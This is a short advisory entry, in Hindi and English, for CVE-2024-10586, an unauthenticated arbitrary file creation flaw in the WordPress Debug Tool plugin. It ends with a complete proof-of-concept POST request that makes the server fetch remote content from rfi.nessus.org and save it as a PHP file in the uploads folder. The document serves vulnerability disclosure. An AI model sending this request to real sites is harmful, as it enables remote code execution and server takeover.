
Debug Tool <= 2.2 - अनधिकृत मनमानी फ़ाइल निर्माण
डीबग टूल <= 2.2 - अप्रमाणित मनमाना फ़ाइल निर्माण
वर्डप्रेस के लिए डीबग टूल प्लगइन dbt_pull_image() फ़ंक्शन पर क्षमता जांच की कमी और सभी संस्करणों (2.2 तक और सहित) में फ़ाइल प्रकार सत्यापन की कमी के कारण मनमाना फ़ाइल निर्माण के लिए संवेदनशील है। यह अप्रमाणित हमलावरों के लिए .php फ़ाइलों जैसी मनमाना फ़ाइलें बनाना संभव बनाता है जिनका उपयोग रिमोट कोड निष्पादन के लिए किया जा सकता है।
CVE: CVE-2024-10586
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: debug-tool
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/themes.php?page=themehunk-site-library&template=step
X-WP-Nonce: 47f8dbbb12
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 104
Origin: http://kubernetes.docker.internal
Connection: keep-alive
action=dbt_pull_image&source=http://rfi.nessus.org/rfi.txt&missed=/var/www/html/wp-content/uploads/t.php